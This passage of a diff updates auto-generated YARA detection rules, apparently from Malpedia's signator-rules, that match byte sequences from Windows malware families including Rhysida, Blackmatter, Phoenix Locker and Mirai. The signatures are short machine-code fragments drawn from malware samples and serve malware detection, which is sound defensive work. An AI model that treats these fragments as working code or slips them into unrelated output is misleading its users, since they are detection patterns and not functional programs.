+		$sequence_5 = { 3b01 0f823efeffff 8b55f8 5f }
+		$sequence_6 = { 8bf1 8b4710 3bc3 0f82e8000000 8b4d14 8b5610 2bc3 }
+		$sequence_7 = { 1bc0 f7d8 5e 5d c20800 85f6 750f }
+		$sequence_8 = { 83ec10 894df8 8bca 56 33c0 33f6 8955fc }
+		$sequence_9 = { c7461000000000 c7461400000000 e8???????? 894610 6800040000 8d4618 }
 
 	condition:
-		7 of them and filesize < 433152
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Getmypass_Auto : FILE
+rule MALPEDIA_Win_Rhysida_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ef24a38-2dcf-5e36-ba94-2bb1b309bc31"
+		id = "b37d7cef-6bec-51b1-8798-0b8311f7db61"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.getmypass_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhysida_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "942b395c1b2d446c948aa0d6582010011bc502a4c907e5ca48324090ba079bd9"
+		logic_hash = "25239cc1b2d1119e4ce01e339bf005e03f9d77aa5443040b6232d8bc07fad544"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112529,32 +112594,32 @@ rule MALPEDIA_Win_Getmypass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8de8f9ffff 51 8b95ecfbffff 52 e8???????? }
-		$sequence_1 = { 83c404 85c0 7502 eb0b 8b4dfc 83c101 }
-		$sequence_2 = { 7d34 8b5508 0395f0feffff 0fbe02 83e830 8985f4feffff 8b8df4feffff }
-		$sequence_3 = { 0f85b4020000 837d9819 0f86aa020000 c745a400000000 8b55e0 83ea01 }
-		$sequence_4 = { 0fb61411 33c2 8b4d14 034df0 }
-		$sequence_5 = { 8d4dfc 51 8b55f4 52 8b45f0 50 }
-		$sequence_6 = { 0f8428010000 8b5508 52 e8???????? 83c404 0fb6c0 }
-		$sequence_7 = { 6a00 ff15???????? eb14 8b45a0 50 }
-		$sequence_8 = { 7467 b9???????? e8???????? 8b4dfc 51 8b55f8 52 }
-		$sequence_9 = { 80c201 8b85f4feffff 889405f8feffff ebb4 c745fc00000000 }
+		$sequence_0 = { 4c21f8 488903 4c89d8 4c0face03c 4889c3 4c89d0 4d8b28 }
+		$sequence_1 = { 8b45f0 0145fc 8b45fc 3b45f4 7cbb 8b45f4 83c002 }
+		$sequence_2 = { 85c0 8944242c 0f8582000000 488b4c2438 ff5720 8b44242c 4883c440 }
+		$sequence_3 = { f30f1045d4 f30f1145d0 f30f1045d0 f30f1145cc 90 488d55cc 488d45d8 }
+		$sequence_4 = { 85c0 740c c7452c00000000 e9???????? 488b4500 8b4014 85c0 }
+		$sequence_5 = { 8b5010 8b45dc 01d0 f30f2ac0 f30f594514 f30f58450c 488b45f8 }
+		$sequence_6 = { 4883c002 4889c1 e8???????? 668945f4 488b4510 4883c004 488945e8 }
+		$sequence_7 = { e8???????? b801000000 4881c4a0110000 5d c3 55 57 }
+		$sequence_8 = { 4801d1 4801d0 41d1e9 660f6f01 458d51ff ba10000000 0f1100 }
+		$sequence_9 = { 85c0 75ca 4889ea 4889d9 e8???????? 83c001 7448 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 2369536
 }
-rule MALPEDIA_Win_Temp_Stealer_Auto : FILE
+rule MALPEDIA_Win_Rambo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b48048b-b096-5784-980a-c1580b4dfd03"
+		id = "9f18152a-df9c-5933-beb1-7d48427107b5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.temp_stealer_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rambo_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "2fe51b5c6906bc550bb0cdd93c915effb0d85e2b560daf9bcb0132c66585b9e7"
+		logic_hash = "43a3f5e58cc73b887b9d9425ae48fd61511eb3413bc03e0babb322fa4b593a9b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112568,32 +112633,38 @@ rule MALPEDIA_Win_Temp_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48896c2410 4889742418 57 4156 4157 4883ec20 4c635a08 }
-		$sequence_1 = { eb1e 498b8ce9f0940400 8a44f938 a840 7508 0c02 8844f938 }
-		$sequence_2 = { 33c0 4d8bca 49f7d9 8d7801 4903c0 493bc3 774a }
-		$sequence_3 = { 488bd0 488d4dd0 e8???????? 448bc6 488d55f0 e8???????? 4c8bc0 }
-		$sequence_4 = { e8???????? 4c8bc0 488d55f0 488d4dd0 e8???????? 488bd0 }
-		$sequence_5 = { 488bd3 4c8d05f6410200 83e23f 488bcb 48c1f906 488d14d2 }
-		$sequence_6 = { 7f34 33d2 4d85c9 7e24 498bcd }
-		$sequence_7 = { 894708 488d5901 41bf20000000 418bc7 48f7e3 498d4fdf 480f40c1 }
-		$sequence_8 = { 83fa08 7d17 4863c2 488d0c80 488d05b39f0300 488d0cc8 }
-		$sequence_9 = { 8d58b0 498bce 448bc3 488d15f8280100 e8???????? 85c0 7429 }
+		$sequence_0 = { 85f6 745e 57 6a02 6a00 56 }
+		$sequence_1 = { ff15???????? 8bf0 83c420 85f6 7437 }
+		$sequence_2 = { 83c428 6a32 ff15???????? 8d85f8faffff 50 }
+		$sequence_3 = { 57 8d85f8faffff 6a01 50 ff15???????? 80a43df8faffff00 }
+		$sequence_4 = { e8???????? 8065fe00 8d45fc 50 8d85f8feffff 50 c645fc72 }
+		$sequence_5 = { 8d85f0feffff 50 8d85ecfdffff 50 e8???????? ff750c 8d85ecfdffff }
+		$sequence_6 = { 7437 56 6a01 ff7508 e8???????? 59 50 }
+		$sequence_7 = { 8d85fcfeffff 59 50 ff15???????? 33c0 c9 }
+		$sequence_8 = { c68424000400000b e8???????? 8d4c2424 8d542420 51 8d442414 }
+		$sequence_9 = { 8dbc24ec000000 be???????? f3ab b906000000 8dbc24d0000000 f3a5 6804010000 }
+		$sequence_10 = { e8???????? 50 8d4c2428 c68424040400000a e8???????? }
+		$sequence_11 = { e8???????? 8d4c2464 c684240004000001 e8???????? }
+		$sequence_12 = { 33c9 89542474 894c245c 8d542474 }
+		$sequence_13 = { 8d4c241c c68424000400000f e8???????? 8d8c249c000000 }
+		$sequence_14 = { 8b430d 84c9 7403 50 ffd5 8a4b04 }
+		$sequence_15 = { aa ff15???????? 8b4c2408 8d54240c 50 }
 
 	condition:
-		7 of them and filesize < 652288
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Taintedscribe_Auto : FILE
+rule MALPEDIA_Win_Winordll64_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1cc2e00-4207-5694-9f4b-262fcd7729da"
+		id = "08e3713d-71e0-5b8a-9ceb-d90daa753676"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taintedscribe_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.winordll64_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "5d981495a3922cbb61b73e09b9b5becae7637fb3153cbba90f67db62eec8bfc1"
+		logic_hash = "a4a004425dba88268c2d3d715c259f2863978c42cd46c83d869be58ecc44a5d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112607,32 +112678,32 @@ rule MALPEDIA_Win_Taintedscribe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8916 8b4dfc 5e 33cd 33c0 5b }
-		$sequence_1 = { 668995e4f9ffff e8???????? 8b8590f7ffff 8d95e4f9ffff }
-		$sequence_2 = { 8bf8 f3a5 8b4b28 83c414 85c9 7518 5f }
-		$sequence_3 = { d3e3 33c0 85db 7e22 8da42400000000 }
-		$sequence_4 = { 8b4dcc 894308 8b45d0 50 51 89530c }
-		$sequence_5 = { 8b5358 898d88fbffff 8b4b50 0f94c0 807b1400 899584fbffff 898d8cfbffff }
-		$sequence_6 = { 5b 5d c20c00 83f803 7574 }
-		$sequence_7 = { 898da8fbffff 8d45e8 8985b4fcffff 8b433c 8bd0 8d4ddc }
-		$sequence_8 = { 6a00 6a00 ff15???????? 85c0 7516 }
-		$sequence_9 = { bb01000000 d3e3 33c0 85db 7e1e 8d4900 }
+		$sequence_0 = { 33ff e9???????? 488b0b 4c8d442440 488d542450 ff5318 85c0 }
+		$sequence_1 = { 4533c0 8bd3 e8???????? 8bf0 85c0 }
+		$sequence_2 = { 488d4158 41b806000000 488d1528120100 483950f0 740b 488b10 4885d2 }
+		$sequence_3 = { ba11000000 41ff5720 33d2 448be2 4889542440 8bda 4889542448 }
+		$sequence_4 = { 486bdb1c 4803df 48895e10 4d6be41c 4c03e7 4c896608 }
+		$sequence_5 = { 4803d7 4c897c2420 ff15???????? 037578 33c9 e8???????? 483bc3 }
+		$sequence_6 = { ff15???????? e9???????? 488d15c61c0100 488d4dbc }
+		$sequence_7 = { 498bcc ff15???????? 48635538 488b4dd0 ff5730 4c635d38 4d03eb }
+		$sequence_8 = { eb06 ffc2 4883c002 66443930 75f4 488d742470 48837d8808 }
+		$sequence_9 = { 488bc1 48ffc0 ffc3 803800 75f6 4533c9 4533c0 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Unidentified_105_Auto : FILE
+rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eddc8e7d-c7d8-56a8-9cd5-0e8cda2282d2"
+		id = "211c4ada-8c2c-53b1-a8d1-ffd67dfd6fac"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_105_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phoenix_locker_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "4e03e917de401318ff8b0ae85a40744aaa875bb14cd2721a1a9fd7b49998e501"
+		logic_hash = "fc57928d88a0e4a78b2d227bc29cc732b1edff7e878d1ae0306413cb72bae6ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112646,71 +112717,71 @@ rule MALPEDIA_Win_Unidentified_105_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 53 56 57 6800002000 }
-		$sequence_1 = { 8d542420 e8???????? 85c0 740d 6a64 ff15???????? }
-		$sequence_2 = { 84d2 75f9 2bc1 8bf8 8d4f02 }
-		$sequence_3 = { 50 51 68???????? 53 e8???????? 8b95ecfeffff }
-		$sequence_4 = { 8945fc 83ff04 7e7b 8d57fb c1ea02 42 }
-		$sequence_5 = { e8???????? 6800002000 8bd8 6a00 53 e8???????? }
-		$sequence_6 = { 75f9 2b55f0 8d45f8 50 53 52 }
-		$sequence_7 = { 50 68???????? 52 e8???????? 83c414 6800020000 e8???????? }
-		$sequence_8 = { 8818 3bca 752a 0fbe0c31 83e103 }
-		$sequence_9 = { 56 8d95f8efffff 52 8d041f 50 e8???????? 8b85f4efffff }
+		$sequence_0 = { 8d4f01 49f7c204600d78 4183c9ff f9 4533c0 e9???????? ff15???????? }
+		$sequence_1 = { 4c0fbfcb 4903f5 4803e9 4c8bdc 41c0e2f9 4881ec80010000 }
+		$sequence_2 = { 0fbfd2 4899 450fb7c4 4c8d4080 480fb7d3 490fbfd6 }
+		$sequence_3 = { 4d8d8424b602a3ea 660fbeca 488bcb e9???????? e8???????? 8bd5 498d8c1cb602a3ea }
+		$sequence_4 = { 48818c24080000008b626a49 68342cb403 81ac2410000000ec5e9720 4881bc2400000000825a821d 68b97f0b55 66819424000000007c2e 680d2ea817 }
+		$sequence_5 = { 488bfb 483bde e9???????? 0f8508feffff 4c8d5c2450 }
+		$sequence_6 = { 0f8441010000 418bbf84000000 41c0f875 40f6c621 458b8788000000 413bfb e9???????? }
+		$sequence_7 = { 0f8579010000 39442460 e9???????? 0f845b010000 488d542460 66410fbecb 660fc9 }
+		$sequence_8 = { 4c8b842428010000 80e5d5 d2c5 894228 6681c1f04d 4963c7 d2d4 }
+		$sequence_9 = { e8???????? 4155 4151 9c 49b98059c32d64378851 e8???????? 4c0fbbea }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 3702784
 }
-rule MALPEDIA_Win_Unidentified_063_Auto : FILE
+rule MALPEDIA_Win_Bee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d22cba4e-b95b-5578-ac95-09534bd7dc14"
-		date = "2022-11-21"
-		modified = "2022-11-25"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_063_auto.yar#L1-L124"
+		id = "db73c98e-464c-5a10-86d4-5be67acb42ee"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bee_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "14c180eecdf0e6fbf2b936d6c444ad58c2e649e1fa770106e8719057ee1aefbd"
+		logic_hash = "5ff9293be730d91df0bdf17c2150532b12e666a23f61e90864080eb355a44306"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20221118"
-		malpedia_hash = "e0702e2e6d1d00da65c8a29a4ebacd0a4c59e1af"
-		malpedia_version = "20221125"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d43cf 83f819 770c 6689b550030000 e9???????? }
-		$sequence_1 = { 7363 488bf3 4c8d35dfc40100 83e63f 488beb 48c1fd06 48c1e606 }
-		$sequence_2 = { e8???????? 4863f8 488d3588800100 488bcb }
-		$sequence_3 = { 0f11442478 4c8b4708 488d442470 493bc0 7362 488b07 488d4c2470 }
-		$sequence_4 = { 4885c9 7407 48ff25???????? c3 48894c2408 57 4883ec50 }
-		$sequence_5 = { 83f801 7518 488b0d???????? 488d05bf5f0100 483bc8 7405 e8???????? }
-		$sequence_6 = { 8b8c96d0cd0200 8b534c 33c8 0fb6c1 }
-		$sequence_7 = { 0f84e7000000 488b0e 483bc8 740e 4885c9 7406 }
-		$sequence_8 = { 498bc2 418be9 48c1f806 488d0d708c0100 4183e23f 4903e8 }
-		$sequence_9 = { 488d158a5a0200 488bcb e8???????? 85c0 7499 488d157f5a0200 488bcb }
+		$sequence_0 = { 8b450c 2bc6 50 03fe 57 8d4c2434 899c2498000000 }
+		$sequence_1 = { e8???????? 68dc050000 ffd6 8b842488000000 39ac249c000000 7307 8d842488000000 }
+		$sequence_2 = { e8???????? 83c404 837e5410 720c 8b4e40 51 e8???????? }
+		$sequence_3 = { c700???????? 894804 894808 83c00c 50 e8???????? }
+		$sequence_4 = { 7d10 668b4c4310 66890c4544504200 40 }
+		$sequence_5 = { 0fb6510c 885004 8b5110 895008 0fb65114 }
+		$sequence_6 = { 50 c744242488130000 ff15???????? 8b1d???????? }
+		$sequence_7 = { 50 57 ffd5 83f8ff 7508 ff15???????? f7d8 }
+		$sequence_8 = { 8d1c8d00534200 8bf8 83e71f c1e706 8b0b 0fbe4c3904 83e101 }
+		$sequence_9 = { 8bf8 eb02 33ff c744242cffffffff 897c2414 85ff }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 394240
 }
-rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE
+rule MALPEDIA_Win_Blackmatter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "211c4ada-8c2c-53b1-a8d1-ffd67dfd6fac"
+		id = "7e457194-4a19-57a3-89ac-b5153afc0744"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phoenix_locker_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackmatter_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "fc57928d88a0e4a78b2d227bc29cc732b1edff7e878d1ae0306413cb72bae6ed"
+		logic_hash = "c5598bfcc346f3d5f3d24c66f49b6d8b4e14cf3a3802140e28639e017dd52693"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112724,32 +112795,32 @@ rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4f01 49f7c204600d78 4183c9ff f9 4533c0 e9???????? ff15???????? }
-		$sequence_1 = { 4c0fbfcb 4903f5 4803e9 4c8bdc 41c0e2f9 4881ec80010000 }
-		$sequence_2 = { 0fbfd2 4899 450fb7c4 4c8d4080 480fb7d3 490fbfd6 }
-		$sequence_3 = { 4d8d8424b602a3ea 660fbeca 488bcb e9???????? e8???????? 8bd5 498d8c1cb602a3ea }
-		$sequence_4 = { 48818c24080000008b626a49 68342cb403 81ac2410000000ec5e9720 4881bc2400000000825a821d 68b97f0b55 66819424000000007c2e 680d2ea817 }
-		$sequence_5 = { 488bfb 483bde e9???????? 0f8508feffff 4c8d5c2450 }
-		$sequence_6 = { 0f8441010000 418bbf84000000 41c0f875 40f6c621 458b8788000000 413bfb e9???????? }
-		$sequence_7 = { 0f8579010000 39442460 e9???????? 0f845b010000 488d542460 66410fbecb 660fc9 }
-		$sequence_8 = { 4c8b842428010000 80e5d5 d2c5 894228 6681c1f04d 4963c7 d2d4 }
-		$sequence_9 = { e8???????? 4155 4151 9c 49b98059c32d64378851 e8???????? 4c0fbbea }
+		$sequence_0 = { 83f803 7409 83f802 0f857c010000 e8???????? 83f83d }
+		$sequence_1 = { c20400 55 8bec 83c4f0 53 c745fc00000000 c745f800000000 }
+		$sequence_2 = { 837dd800 7505 e9???????? 68???????? e8???????? }
+		$sequence_3 = { 75df 8bc2 5e 5a 5d }
+		$sequence_4 = { 8945f0 837df000 0f8491000000 ff75f4 ff75f0 }
+		$sequence_5 = { 50 8d4302 50 e8???????? a3???????? 6a40 8d85fcfeffff }
+		$sequence_6 = { 7429 8d85f8feffff 50 ff15???????? 85c0 }
+		$sequence_7 = { 72df 807d085a 77df b802000000 5d c20400 55 }
+		$sequence_8 = { 6a00 ff15???????? 8945f0 ff75f4 }
+		$sequence_9 = { f7f1 92 3b4508 720b 3b450c }
 
 	condition:
-		7 of them and filesize < 3702784
+		7 of them and filesize < 194560
 }
-rule MALPEDIA_Win_Postnaptea_Auto : FILE
+rule MALPEDIA_Win_Cuegoe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bae1adbd-4c25-5db5-ad59-5851d74e85fc"
+		id = "f801c54c-d3a8-51b1-91c4-e3ef8af3f7f9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.postnaptea_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cuegoe_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "67d33b8cfdd7ab58e5e7ea5ee0e718fa9e407a5184249ea4dfd2464e78e03ab8"
+		logic_hash = "d0e6e6925a0e42ac5470513773688ead9a134439bb7102ccc5d0a7edc70c0169"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112763,32 +112834,32 @@ rule MALPEDIA_Win_Postnaptea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c74580a1f5a2f5 c74584a3f5a4f5 c74588a5f5a6f5 c7458cd3f5f1f5 c74590f9f5eff5 c7459481f50000 4533c0 }
-		$sequence_1 = { c745841cf506f5 c7458816f519f5 c7458c13f51df5 c7459059f540f5 c745945bf50000 33f6 8bd6 }
-		$sequence_2 = { c7853002000013f51bf5 c7853402000043f520f5 c785380200000bf515f5 c7853c02000047f53bf5 c785400200001cf50cf5 c785440200000df505f5 c7854802000015f54ef5 }
-		$sequence_3 = { c7852009000003f500f5 c785240900001cf506f5 c7852809000055f515f5 c7852c09000018f51cf5 c785300900001cf55af5 c785340900005ef510f5 c7853809000008f574f5 }
-		$sequence_4 = { ff8170040000 83b97004000002 0f8493010000 83cfff 488d2dcb730300 897350 89732c }
-		$sequence_5 = { 498bd4 e8???????? c1e81f 4c8b7c2430 84c0 7430 4c897c2428 }
-		$sequence_6 = { c7856008000049f54af5 c785640800004bf54cf5 c785680800004df54ef5 c7856c0800004ff550f5 c7857008000051f552f5 c7857408000053f554f5 c7857808000055f556f5 }
-		$sequence_7 = { c745f001000000 66c745f40001 3a45dc 0f95c3 4c8d4de0 4c8d45c8 488d55b0 }
-		$sequence_8 = { c7450455f50000 4533c9 418bd1 41b8a70a0000 0f1f4000 0f1f840000000000 4863c2 }
-		$sequence_9 = { c745a401000000 c74424300af51ff5 c744243409f50af5 c744243814f51df5 c744243c1af53ff5 c74424402ff523f5 c74424442ef521f5 }
+		$sequence_0 = { 895dfc e8???????? 59 8d4dd0 8bf0 e8???????? }
+		$sequence_1 = { 83781808 7205 8b4004 eb03 83c004 8d4de4 51 }
+		$sequence_2 = { 324dfe 80e17f 3008 8b06 8bc8 c1f905 8b0c8d80cf0310 }
+		$sequence_3 = { 8b4534 c645fc06 e8???????? 33f6 397548 7409 }
+		$sequence_4 = { 8b7da8 3bfb 7636 803e7f 7431 4f }
+		$sequence_5 = { c1e108 330c9d68a10310 bb01000000 898860020000 885c0658 8b7044 8b4824 }
+		$sequence_6 = { a1???????? 33c5 894558 6a38 b8???????? e8???????? }
+		$sequence_7 = { 894d14 8b4804 83c40c 03f7 297d0c 894d18 742c }
+		$sequence_8 = { eb02 33c0 8903 8365fc00 8d45f3 50 8b450c }
+		$sequence_9 = { ff7004 ff30 8d45d4 50 8bc6 e8???????? 8bc6 }
 
 	condition:
-		7 of them and filesize < 2457600
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_8T_Dropper_Auto : FILE
+rule MALPEDIA_Win_Evilbunny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "485513e6-6a30-5542-9db5-771c168cddae"
+		id = "3746f242-5ef7-565f-99d0-aeeb4c27d515"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.8t_dropper_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.evilbunny_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "ce9c22a4da7356dd0a0bfe7a1e7d1abeadd8c256121840ed85ba440a85beb469"
+		logic_hash = "1534b24ff80468ad553b2eed5ffad4b00ea68305fd3769acbc60a82e33460626"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112802,32 +112873,32 @@ rule MALPEDIA_Win_8T_Dropper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c9ff f2ae f7d1 49 c6440c0c52 }
-		$sequence_1 = { 83c40c c3 8b442408 83f801 }
-		$sequence_2 = { 8d942410010000 6804010000 52 68???????? ff15???????? 8d842410010000 68???????? }
-		$sequence_3 = { 8bc6 5f 5e 5b c9 c3 ff35???????? }
-		$sequence_4 = { 49 51 68???????? 6a02 50 8b442418 }
-		$sequence_5 = { 6801000080 ff15???????? bf???????? 83c9ff 33c0 }
-		$sequence_6 = { 683f000f00 50 52 6801000080 ff15???????? bf???????? 83c9ff }
-		$sequence_7 = { 51 ff15???????? 8d942410010000 6804010000 52 68???????? }
-		$sequence_8 = { 83c408 85f6 741b 56 6800700000 6a01 }
-		$sequence_9 = { 7559 8b4c2408 51 ff15???????? 8d942410010000 6804010000 }
+		$sequence_0 = { 8b4df8 894d0c 6aff 8b5508 52 e8???????? 83c408 }
+		$sequence_1 = { 8b4df4 894d10 e9???????? 8be5 5d c3 43 }
+		$sequence_2 = { 8b4df4 8b1488 8955cc 8b4508 8b08 8b5110 8b45f4 }
+		$sequence_3 = { 8bf4 8d45e0 50 6a00 8b4dfc 51 68???????? }
+		$sequence_4 = { 8b4508 8945fc c745f800000000 c745f400000000 c745f000000000 8bf4 6803800000 }
+		$sequence_5 = { 8bf4 50 ff15???????? 3bf4 e8???????? 8b4dec 83b93008000000 }
+		$sequence_6 = { 8b95a8fcffff 89511c 6a00 8b451c 50 8b4d18 }
+		$sequence_7 = { 8d4da8 51 e8???????? 83c40c c645fc03 8d4d88 e8???????? }
+		$sequence_8 = { 8d8df4feffff 51 e8???????? 83c408 8d95f4feffff 52 e8???????? }
+		$sequence_9 = { c745fccccccccc 894dfc 68eeeac01f 68???????? 8b4dfc e8???????? 8945f8 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 1695744
 }
-rule MALPEDIA_Win_Mirai_Auto : FILE
+rule MALPEDIA_Win_Orchard_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "009ec30f-f4c4-5af9-afbc-ec79b59a007e"
+		id = "17f17024-3843-5eab-9d60-b1508d38046a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mirai_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orchard_auto.yar#L1-L153"
 		license_url = "N/A"
-		logic_hash = "4b520e473aaa65894d4224b9e87eda17dce7091dc19025c78727d13bc484a535"
+		logic_hash = "138080fd95f8adafa6f2759bdbd81f59c5234a21d6fcbf8907de2c121b106fe9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112841,32 +112912,38 @@ rule MALPEDIA_Win_Mirai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e608 0bf5 c1e608 0bf7 8bbc24c0000000 3304bd30a55c00 8bbc24b0000000 }
-		$sequence_1 = { c1e810 0fb6c0 331c8588b65c00 8b442418 c1e808 0fb6c0 331c8588b25c00 }
-		$sequence_2 = { d3e2 8b4df4 0fb60401 0bc2 8b4dec c1f903 8b55f4 }
-		$sequence_3 = { 85c0 7540 ff15???????? 50 68???????? 6a52 68???????? }
-		$sequence_4 = { c60100 41 c60100 0fb6475f 8802 0fb6475e 42 }
